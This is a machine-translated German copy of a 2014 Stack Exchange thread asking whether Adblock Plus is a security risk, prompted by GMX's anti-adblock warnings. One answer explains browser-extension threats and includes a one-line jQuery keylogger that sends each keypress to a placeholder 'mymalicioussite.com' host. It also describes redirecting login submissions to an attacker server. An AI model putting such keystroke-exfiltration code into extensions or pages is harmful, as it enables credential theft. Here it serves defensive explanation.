Frage:
Ist Adblock (Plus) ein Sicherheitsrisiko?
Tobias Kienzler
2014-02-27 13:25:32 UTC
view on stackexchange narkive permalink

Die Website meines E-Mail-Anbieters ( http://www.gmx.de ) wurde kürzlich mit der (deutschen) Website http://www.browsersicherheit.info/ verlinkt. Code>, der grundsätzlich behauptet, dass Adblock Plus (und andere) aufgrund seiner Fähigkeit, das Erscheinungsbild einer Website zu ändern, möglicherweise tatsächlich für Phising missbraucht werden. Hier ist ein Zitat von dieser Seite sowie deren Übersetzung:

Viele Add-ons haben Zugriff auf alle Ihre Eingaben im Browser und können diese auch ein Dritte weitergeben - auch Ihr Bank-Passwort. Dies kann auf allen Web-Seiten bearbeitet werden. Sicherheitsmechanismen wie SSL können das nicht erledigt.

übersetzt:

Solche Addons können auf alle Eingaben Ihres Browsers zugreifen und diese auch an Dritte weiterleiten - auch an Ihre Bankpasswort. Dies kann auf allen Websites passieren. Sicherheitsmechanismen wie SSL können dies nicht vermeiden.

Ok, sie erwähnen andere (ziemlich offensichtlich Crapware) Addons, aber ist Adblock Plus wirklich eine Sicherheitsbedrohung oder nutzen die Betreiber dieser Site einfach die Gelegenheit dazu Versuchen Sie, unerfahrene Nutzer dazu zu bringen, ihre Anzeigen erneut anzuzeigen?

Dies läuft darauf hinaus: Führen Sie keine Anwendungen aus, denen Sie nicht vertrauen. Wenn Adblock böse wäre, könnte es Ihre Anmeldedaten stehlen. Wenn eine andere ausführbare Datei, die Sie ausführen, böse wäre, könnte dies auch der Fall sein.
Nur um des Humors willen: Warum benutzt du nicht Ghostery? ;-);
Können Sie die Frage klären? Fragen Sie, ob Addons wie Adblock theoretisch ein Sicherheitsrisiko darstellen könnten, oder fragen Sie, ob Adblock derzeit ein Sicherheitsrisiko darstellt?
@MooingDuck Guter Punkt - ich frage nach aktuell, da das theoretisch eindeutig möglich sein sollte, oder?
Ich frage mich, wie viele Benutzer Adblock Plus verwendet haben, nachdem sie alle Artikel dazu gelesen haben. Einige Unternehmen sollten den [Streisand-Effekt] (http://en.wikipedia.org/wiki/Streisand_effect) wirklich berücksichtigen, bevor sie eine Erpressungskampagne starten.
** Update: ** Die FUD-Site-Administratoren (oder Adblock selbst :) haben inzwischen die Adblocker aus der Liste der "Bad-Ons" entfernt (oh je, diese Wortschöpfung allein lässt mich an B-Filme denken). Außerdem bot mir Adblock jetzt die Möglichkeit, FUD-Banner auf der GMX-Homepage auszublenden. Ich denke, das ist nicht genau der Effekt, auf den sie gehofft haben ...
Um fair zu sein, gab es im Chrome-Webstore eine große Anzahl von Malware-Adblock-Klonen. Ich habe schon ein paar gemeldet und sie schließlich abbauen lassen, aber jetzt aufgegeben. Einige gingen so weit, die genauen Beschreibungen und Symbole aus den legitimen Adblock-Erweiterungen zu kopieren, um Treffer zu erhalten. Man konnte den Unterschied zwischen "Adblock" und "Adb1ock" nicht erkennen. Bei all den gefälschten 5-Sterne-Bewertungen ist es schwer zu sagen, was tatsächlich legitim ist. Schauen Sie sich einfach alle "Adblock for XXX" -Erweiterungen an, die angeblich funktionieren, und alle Kommentare, die etwas anderes angeben. Seien Sie einfach schlau, was Sie herunterladen.
@JeffMercado Ist das dann nicht ein ernstes Problem mit dem Chrome-Webstore? Ich erinnere mich nicht, dass solche BS bei Mozilla passiert sind ...
Es ist definitiv. Ich sage nur, die Leute können irregeführt werden, wenn sie glauben, dass diese Klone von den Machern der legitimen Adblock-Versionen stammen. Sie könnten denken, dass der Klon-Adblock ein Betrug war, also sind alle Adblöcke (Klon oder nicht) Betrug. Es ist möglich, dass jemand bei GMX davon verbrannt wurde und ohne wirklich nachzuforschen, auf diese Kampagne drängte.
Es ist schließlich Open-Source-Software, die dieses Problem ein für alle Mal beseitigen sollte.
Umgekehrt ist Adblock eine Form der Sicherheit. Vor der Installation auf Android wurde ich mit Anzeigen bombardiert, die mich aufforderten, die App eines Werbetreibenden zu installieren.
@TheRookierLearner Könnten Sie bitte Ghostery erweitern?
@Federico Grundsätzlich werden alle Tracking-, Adding- und Nörgel-Teile von Websites angezeigt und blockiert: https://www.ghostery.com/
Tobias, ich weiß und ich benutze es, ich habe gefragt, weil die Frage von @TheRookierLearner sarkastisch schien und ich nicht verstehen konnte.
@Federico Ich denke, sie wollten spöttisch vorschlagen, ein anderes Addon zu verwenden, um zu überprüfen, wie vertrauenswürdig Adblock ist, das lediglich das Vertrauen von Adblock zu Ghostery delegiert ...
@Federico - Ja, ich schlage tatsächlich ein weiteres Add-On vor. Wenn Sie im Google Web Store nach Erweiterungen nach "Adblock" suchen, erhalten Sie viele Ergebnisse wie "Adblock Pro", "Adblock Premium", "Adblock Plus". (und die Liste geht weiter) und Sie wissen nicht, welche die legitime ist. Wenn Sie nach "Ghostery" suchen, erhalten Sie nur eine Erweiterung. Ich bin kein Fan von Ghostery, aber aus irgendeinem Grund scheint es nicht mehrere Kopiererweiterungen zu geben (und trägt nicht zur Verwirrung bei, die durch "Adblock" entsteht).
Zur Beantwortung bin ich einfach auf die Website von Ghostery gegangen und habe Folgendes festgestellt: `Außerdem heißt es auf der Website eindeutig:` Ghostery sammelt standardmäßig keine Daten. Sie können uns Daten senden, indem Sie die Ghostrank-Funktion aktivieren. `(mehr in ihrer Datenschutzerklärung, EULA und FAQs). Auch hier möchte ich nur behaupten, dass ich nicht Ghostreys Fan oder Promoter bin (tatsächlich bricht es manchmal einige Seiten und blockiert die Anzeigen auf YouTube nicht), aber es hat nicht die Verwirrung (oder anderen Mist wie "Zugriff" Benutzereingabe ") wie bei anderen Werbeblockern.
Ich dachte nur, dass es wichtig ist, dies zu teilen. Nach der Verwendung von adblock plus hatte ich Malware-Probleme. Ich hatte Adblock auf meinem Android installiert. Ich habe mein Telefon seit über einem Jahr ohne Probleme. Nachdem ich adblock verwendet habe, wird jedes Mal, wenn ich meinen Bildschirm entsperre, ein Popup zur Adcasch-Site angezeigt. Es war sehr verdächtig, weil es in dem Standardbrowser meines Telefons angezeigt wird, den ich nie benutze. Ich verwende immer nur ein von Drittanbietern installiertes Chrome. Ich habe ein Antivirenprogramm auf meinem Telefon. Es wurde gescannt und es wurden keine Bedrohungen gefunden. Ich vermutete eine Werbeblockade, da es die letzte heruntergeladene App war, die der App so viele Berechtigungen erteilte. Ich habe die App in meinem deaktiviert
Bestenfalls handelt es sich um anekdotische Beweise. Sind Sie sicher, dass Sie The real AdblockPlus von adblockplus.org installiert haben? Dies ist (noch) keine wirkliche Antwort.
Nur teilen: Ich habe Adblock Plus nicht mehr verwendet, weil es zu viel Ressourcen auf meinem Computer verbraucht hat.Jetzt verwende ich immer mein [benutzerdefiniertes VPN] (https://github.com/hwdsl2/setup-ipsec-vpn), also habe ich es auch zu einem DNS-Server gemacht und [die bekannten Anzeigen- und Tracking-Hosts] aufgelöst (https://github.com/StevenBlack/hosts/blob/master/hosts) bis `0.0.0.0`.Problem behoben: Anzeigen und Tracking auf Netzwerkebene auf allen meinen Geräten, die für die Verwendung dieses VPN konfiguriert sind, unauffällig deaktiviert.
Neun antworten:
Andalur
2014-02-27 15:57:50 UTC
view on stackexchange narkive permalink

Ist dies nicht der Fall. Dies ist eine FUD-Kampagne ( Angst, Unsicherheit und Zweifel) von GMX, da sie ihre Anzeigen schalten möchten. Es besteht absolut kein Sicherheitsrisiko durch die genannten Werbeblocker. Sie haben der Liste Crapware hinzugefügt, damit sie legitimer aussieht.

Natürlich sind solche Kampagnen sehr ungewöhnlich, insbesondere von einem so großen und bekannten Unternehmen wie GMX. Leider habe ich keine englische Quelle zur Hand (da es sich nur um eine deutsche Kampagne handelt), aber da Sie Deutsch sprechen, möchten Sie möglicherweise diesen Artikel auf heise.de lesen.

Update # 1: United Internet, das Unternehmen hinter GMX, wurde vielfach kritisiert, weil es Kunden irreführte, indem es fälschlicherweise behauptete, dass auf seinem PC ein Sicherheitsrisiko besteht. Das Wall Street Journal (deutsche Ausgabe) nannte die auf GMX angezeigten Warnungen und die Website, auf die sie mit einer "Angstkampagne" verweisen.

Update Nr. 2: GMX sagt dies jetzt Wenn Sie Werbeblocker verwenden, wird der Link nicht mehr angezeigt. Wenn Sie jedoch Crapware verwenden, die Werbung einfügt, wird die Liste auf der Website http://www.browsersicherheit.info/ entsprechend aktualisiert listet jetzt nur eine kleine Sammlung von Crapware auf. Diese Liste ist keineswegs vollständig und daher keine zuverlässige Quelle, wenn Sie wissen möchten, ob in Ihrem Browser Crapware installiert ist. United Internet vertritt jedoch weiterhin die Position, dass Benutzer, die ihre Websites besuchen, keine Werbeblocker verwenden sollen, und sagte, dass sie in Zukunft andere Anti-Blocking-Methoden entwickeln werden ( deutsche Quelle). P. >

Vielen Dank für den Link, es läuft im Wesentlichen auf Ihre Antwort hinaus und erklärt weiter, dass diese Kampagne nach [der Ankündigung, Eyeo wegen ihrer Funktion "Akzeptable Adds" zu verklagen (auch auf Deutsch)) nicht überraschend ist (http: / /www.heise.de/newsticker/meldung/Acceptable-Ads-Werber-wollen-offenbar-Adblock-Plus-verklagen-2104273.html) - Anscheinend basiert die FUD auf [einem Chrome-Vorfall] (http: // arstechnica). com / security / 2014/01 / Malware-Anbieter-kaufen-Chrome-Erweiterungen-um-Adware-gefüllte-Updates zu senden /)
Wem vertraust du mehr? ABP (das ständig überprüft wird und dampfgewalzt würde, wenn es mybank.com durch etwas anderes ersetzen würde) oder eine zufällige deutsche Firma? Könnte ein Addon für "Evil Purposes" verwendet werden? Natürlich ... aber ohne Beweise sind es nur blinde Anschuldigungen und FUD.
@WernerCD GMX ist ein bedeutender E-Mail-Anbieter, einer der führenden Nicht-Google Mail-Anbieter. Es ist keine "zufällige deutsche Firma". Und von allen Ländern ist ein * deutsches * Unternehmen das, dem Sie misstrauen?
@Superbest GMX und andere deutsche E-Mail-Anbieter führen auch die Kampagne "E-Mail made in Germany" durch, bei der Kunden irregeführt werden, dass E-Mails, die über ihre Mailserver gesendet werden, vor Überwachung geschützt sind.
@Superbest Nun ... wenn es keine amerikanische Firma ist, dann ist es eine andere zufällige Firma. .. ... ich scherze ich scherze. Aber im Ernst, ich würde dasselbe für die meisten Unternehmen sagen - und würde dasselbe sagen, wenn Comcast oder Google mir sagen würden, ich solle ABP nicht mehr verwenden. Sie müssen eine Augenbraue hochziehen, wenn ein Unternehmen, das von Werbung profitiert, Sie auffordert, die Verwendung eines Werbeblockers einzustellen.
Es ist wirklich unehrlich zu sagen, dass es kein Risiko gibt. Die [Risiken sind jedoch klein genug] (http://security.stackexchange.com/a/52411/4906), denen ich zustimme, dass dies nichts weiter als eine FUD-Kampagne ist.
Das Unternehmen hinter AdblockPlus (Eyeo) ist ziemlich zweifelhaft [1], daher könnte es sinnvoll sein, Benutzer im Allgemeinen zu warnen. Dennoch scheinen Addons wie Adblock Edge [2], die (soweit ich weiß) nur Open-Source-Code verwenden, der auf dem ursprünglichen Ablock basiert, sicherer zu sein. Wenn ich mir das Design der Warnmeldung anschaue, stimme ich auch zu, dass dies hauptsächlich eine freche FUD-Kampagne ist, mit der die Werbeeinnahmen wieder gesteigert werden sollen. [1] http://www.mobilegeeks.de/adblock-plus-adblockgate-eyo-gmbh/[2] https://addons.mozilla.org/de/firefox/addon/adblock-edge/
@Superbest "_Es ist keine" zufällige deutsche Firma "._" Aber ADB ist weltweit bekannt (wie Google). Ein Skandal um ADB wäre eine gute Nachricht für die Welt.
Eine FUD-Kampagne dieser Größenordnung mag "ungewöhnlich" sein, aber Websites, die alles Mögliche sagen, um ihre Anzeigen zu schalten, sind kaum ein neues Phänomen. Einige kleine, unabhängige Websites erkennen Werbeblocker und fordern Sie höflich auf, diese auf ihrer Website zu deaktivieren, da sie auf Werbeeinnahmen angewiesen sind. Und dann gibt es große Unternehmensseiten wie www.denverbroncos.com, auf denen ein Banner mit der Aufschrift "Wir haben festgestellt, dass möglicherweise ein Werbeblocker aktiviert ist. Bitte beachten Sie, dass unsere Website am besten mit deaktivierten Werbeblockern funktioniert." ohne jemals diese zweifelhafte Behauptung zu rechtfertigen. "Best" für wen?
FUD kann wahr sein! Es ist wirklich ein Risiko. Software von Drittanbietern kann viel, wenn nicht alles (möglicherweise durch einen Hack, dem Sie sich aussetzen) auf Ihrem Computer. Ein kleines Risiko angesichts dessen, was passiert. Und weil es ein so kleines Risiko ist, ist es FUD. Aber FUD kann wahr sein.
Code Whisperer
2014-02-27 22:14:58 UTC
view on stackexchange narkive permalink

Update

Nachdem ich darüber nachgedacht habe, muss ich den anderen Antworten darin zustimmen, dass Adblock mehr ist, obwohl es auf Ihre Daten zugreifen kann Wahrscheinlich schützen Sie Ihre Privatsphäre, bevor Sie in sie eindringen. Das eigentliche Risiko sind böswillige Anzeigen, die Sie auffordern, Software auf Ihrem Computer zu installieren. Adblock verhindert dies.

Nachfolgend finden Sie die ursprüngliche, vorsichtige Antwort:

Ja, das ist es vollständig.

Adblock Plus ist eine Browser-Erweiterung / Add-On, entwickelt von einem unabhängigen Entwickler. Adblock kann auf allen Seiten auf das DOM (Dokumentobjektmodell) zugreifen.

AdBlock funktioniert so, dass es ein Skript in Ihren Browser einfügt, der das DOM durchsucht und dann ein hide () für Anzeigen bestimmt.

Dies bedeutet, dass AdBlock (und jede Chrome-Erweiterung mit dieser Berechtigung) auf Ihr DOM zugreifen kann. Adblock kann nicht auf JavaScript-Variablen zugreifen.

Was bedeutet das?

Wenn Sie sich auf einer Website mit sicherer Authentifizierung befinden und ein JavaScript-Objekt mit etwas Privatem wie einem AuthKey vorhanden ist, sind Sie es sicher . AdBlock kann nicht auf JavaScript-Variablen zugreifen.

AdBlock KANN jedoch einen entsprechenden Code ausführen.

$ (Fenster) .onKeyPress (Funktion (e) {$ ('html') ) .append ('<img src =' http: //mymalicioussite.com/stealData/keyPress.png? key = '+ e.keyCode)})

Womit im Wesentlichen alle Schlüssel weitergeleitet werden Sie drücken auf einen Remote-Server.

Dies kann verwendet werden, um Ihr Passwort zu stehlen, was noch schlimmer ist als das Stehlen Ihres Tokens.

Ist AdBlock selbst gefährlich?

Es scheint mir, dass AdBlock nicht übermäßig gefährlich ist, da sich der Entwickler identifiziert hat und von Millionen von Menschen verwendet wird. Wenn es so knifflig wäre wie oben, hätte es wahrscheinlich jemand bemerkt und gepfiffen.

Aber denken Sie nicht, dass Chrome-Erweiterungen absolut sicher sind. Alle können alle Daten sowie andere schädliche Dinge stehlen.

Was kann es sonst noch?

Eine Chrome-Erweiterung kann auch die folgenden Sicherheitsverletzungen ganz trivial ausführen ...

  • Leiten Sie den Inhalt aller gelesenen E-Mails oder Seiten an eine Quelle eines Drittanbieters weiter (sofern diese E-Mail unverschlüsselt enthält Anmeldeinformationen, Sie sind kaputt) Wenn Sie sie auf dem Bildschirm sehen können, können auch alle Chrome-Erweiterungen keine Fragen stellen.
  • Geben Sie Informationen in ein Feld ein und klicken Sie auf die Schaltfläche "Senden". Senden Sie beispielsweise ein e -mail
  • Wenn Sie Ihren Browser geöffnet lassen und die Erweiterung weiß, wie es geht, kann sie über Ihre E-Mail-Oberfläche (Google Mail, Outlook) E-Mails ihrer Wahl an Ihre Kontakte senden. Dies ist trivial.
  • Ändern Sie das Skript, das einer Schaltfläche zugeordnet ist, sofern dies ursprünglich in jQuery eingegeben wurde. Beispielsweise kann die Schaltfläche zum Senden Ihrer Anmeldeinformationen an den Server geringfügig geändert werden, um diese Informationen sowohl an den Server als auch an http: // mymaliciousserver zu senden. Dies ist trivial.

Update

Es wurde durch Diskussion bestätigt, dass AdBlock Open Source ist. Auf diese Weise sollten Sie AdBlock mehr vertrauen, aber denken Sie daran, dass es immer noch in der Lage ist, diese Dinge zu tun. Ich habe die Quelle überprüft und kann mit Sicherheit sagen, dass ich überhaupt keine Ahnung habe, was los ist.

Quelle: Ich bin ein JavaScript- und Chrome-Erweiterungsentwickler.

Hier geht es nur um einen Werbeblocker ... Es gibt viele verschiedene Werbeblocker in der Liste, und ich denke, sie verwenden viele verschiedene Methoden zum Blockieren ...
Wenn es sich um eine Chrome-Erweiterung handelt und Sie zulassen, dass sie auf allen Seiten auf Ihre Daten zugreift, kann sie all diese Aufgaben ausführen. Fast alle Chrome-Erweiterungen fordern diese Berechtigung an, und mit AdBlocker muss es sogar funktionieren, wenn Sie darüber nachdenken.
War AdBlock Plus nicht Open Source? (;
AiliaqftjiCMT Link Bitte?
AililevsodCMT//adblockplus.org/en/contribute-code
Tolle Antwort über das Potenzial von Addons, obwohl IMHO ein wenig zu angstauslösender Titel (ich verwende übrigens Firefox, aber ich denke, dass fast dasselbe dort gilt)
Stimmen Sie sowohl für eine gute Antwort (ob eine Anwendung dies tut oder nicht, dies ist der Austausch von Informationssicherheitsstapeln und solche Fragen verdienen detaillierte Antworten) als auch für den Namen ... was war in der Box?
Der Link wurde bereits von @TobiasKienzler gepostet. Ein Hinweis war auch das große grüne Schild auf der [Hauptseite] (https://adblockplus.org/) mit der Aufschrift * Open Source *.
@TobiasKienzer Das ist großartig. Entschuldigen Sie, während ich AdBlock abspalte und mein Projekt von AdTeese beginne, das jedes Add durch ein Pin-up von Dita von Teese ersetzt.
"Open Source" bedeutet nichts, wenn die Quelle, die Sie betrachten, nicht dieselbe Quelle ist, die die Erweiterung verwendet. Ich habe den [Chrome Extension Source Viewer] (https://chrome.google.com/webstore/detail/chrome-extension-source-v/jifpbeccnghkjeaalbbjmodiffmgedin/reviews) veröffentlicht, mit dem die tatsächliche Quelle einer Erweiterung angezeigt werden kann (= diejenige, die verwendet wird, wenn Sie eine Erweiterung installieren). Natürlich müssen Sie darauf vertrauen, dass die Erweiterung hält, was sie verspricht, d. H. Den richtigen Quellcode anstelle eines zensierten anzeigt. Alles läuft darauf hinaus, "nur Software von Publishern zu installieren, denen Sie vertrauen").
@itcouldevenbeaboat Bitte, ich würde es benutzen :-)
@TobiasKienzler Es sieht so aus, als ob [Firefox hat einen strengeren Überprüfungsprozess] (http://arstechnica.com/business/2014/01/seeking-higher-ground-after-chrome-extension-adwaremalware-problems/), das ein [zu haben scheint Stärkerer Fokus auf manuelle Überprüfungen] (https://wiki.mozilla.org/AMO:Editors/EditorGuide/AddonReviews). Natürlich ist es nicht kinderleicht (und mit längeren Aktualisierungszeiten beim Warten auf die Genehmigung verbunden), aber es könnte mehr sein als Chrome - Google ist nicht sehr explizit darüber, wie sie überprüfen.
Es gibt kein "* JavaScript-Objekt mit etwas Privatem *" - es sei denn, es ist nutzlos. Selbst wenn ein Plugin nicht auf lokale Variablen zugreift, kann es nach dem Zugriff auf die Seite (DOM, Skriptinjektion) alles gefährden, was mit JS passiert, da alle Nebenwirkungsschnittstellen öffentlich sind.
Dies ist ein großartiges Zitat, das für die meisten Programme gelten könnte: "Ich habe die Quelle überprüft und kann mit Sicherheit sagen, dass ich überhaupt keine Ahnung habe, was los ist."
@Bergi Tatsächlich werden Google Chrome-Erweiterungen in einer VM-Sandbox ausgeführt und können auf keine mir bekannten Weise auf JavaScript-Variablen auf der Seite zugreifen.
@itcouldevenbeaboat Eine Erweiterung kann ein Inhaltsskript verwenden, um ein Skriptelement in den Dom einzufügen, das im Javascript-Kontext der Webseite ausgeführt wird.
@itcouldevenbeaboat [Inhaltsskripte] (https://developer.chrome.com/extensions/content_scripts) werden * nicht * in einer virtuellen Maschine ausgeführt. Die JavaScript-Ausführungskontexte sind zwar getrennt, das DOM wird jedoch gemeinsam genutzt. Folglich können Inhaltsskripte Code im Kontext der Webseite ausführen, indem sie Skript-Tags einfügen, Ereignishandler ausführen usw.
@RobW Das ist interessant. Können Sie eine Möglichkeit beschreiben, über eine Chrome-Erweiterung auf eine Fenstervariable auf einer Seite zuzugreifen, z. B. "myVariable", und ich werde sie überprüfen?
@itcouldevenbeaboat Antworten und verknüpfte Antworten finden Sie unter http://stackoverflow.com/q/9515704
Kann es
Loading...